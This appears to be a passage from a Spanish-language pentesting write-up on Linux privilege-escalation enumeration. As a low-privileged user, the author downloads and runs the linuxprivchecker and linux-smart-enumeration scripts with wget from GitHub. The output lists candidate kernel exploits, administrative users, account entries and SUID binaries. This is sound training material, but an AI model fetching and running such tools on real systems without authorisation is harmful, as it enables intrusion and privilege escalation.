wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
penny@ubuntu-16:/tmp$ python ./linuxprivchecker.py
The following exploits are applicable to this kernel version
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
LinuxSmartEnumeration
penny@ubuntu-16:/tmp$ wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
penny@ubuntu-16:/tmp$ bash ./lse.sh -l1
User: penny
Hostname: ubuntu-16
Linux: 4.4.0-87-generic
Distribution: Ubuntu 16.04.3 LTS
Architecture: x86_64
==================================================================( users )=====
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
adm:x:4:syslog,usuario
sudo:x:27:usuario
---
[*] usr030 Other users with shell.......................................... yes!
---
root:x:0:0:root:/root:/bin/bash
usuario:x:1000:1000:usuario,,,:/home/usuario:/bin/bash
penny:x:1001:1001::/home/penny:/bin/bash
---
[*] fst100 Useful binaries................................................. yes!
---
/usr/bin/curl
/usr/bin/dig
/bin/nc.openbsd
/bin/nc
/bin/netcat
/usr/bin/wget
---
[*] fst010 Binaries with setuid bit........................................ yes!
---
/tmp/POC_SUID.o
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/at
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/bin/fusermount
/bin/ntfs-3g
/bin/mount
/bin/ping
/bin/ping6
/bin/umount
/bin/su
---
SUID Binaries ls -lha /bin |grep rws
mas conocido de esta forma: find / -perm -u=s -type f 2>/dev/null
penny@ubuntu-16:/tmp$ ls -lha /bin |grep rws -rwsr-xr-x 1 root root 31K jul 12 2016 fusermount -rwsr-xr-x 1 root root 40K jun 14 2017 mount -rwsr-xr-x 1 root root 139K ene 28 2017 ntfs-3g -rwsr-xr-x 1 root root 44K may 7 2014 ping -rwsr-xr-x 1 root root 44K may 7 2014 ping6 -rwsr-xr-x 1 root root 40K may 17 2017 su -rwsr-xr-x 1 root root 27K jun 14 2017 umount
penny@ubuntu-16:/tmp$ ls -lha /usr/bin |grep rws -rwsr-sr-x 1 daemon daemon 51K ene 14 2016 at -rwsr-xr-x 1 root root 49K may 17 2017 chfn -rwsr-xr-x 1 root root 40K may 17 2017 chsh -rwsr-xr-x 1 root root 74K may 17 2017 gpasswd -rwsr-xr-x 1 root root 33K may 17 2017 newgidmap -rwsr-xr-x 1 root root 39K may 17 2017 newgrp -rwsr-xr-x 1 root root 33K may 17 2017 newuidmap -rwsr-xr-x 1 root root 53K may 17 2017 passwd -rwsr-xr-x 1 root root 23K ene 18 2016 pkexec -rwsr-xr-x 1 root root 134K jul 4 2017 sudo
Referencias
https://www.navajanegra.com/2019/
https://fwhibbit.es/euskalhack-iv-pentesting4ever-illidan
https://fwhibbit.es/en/euskalhack-iv-pentesting4ever-illidan-2
https://fwhibbit.es/en/author/naxhack5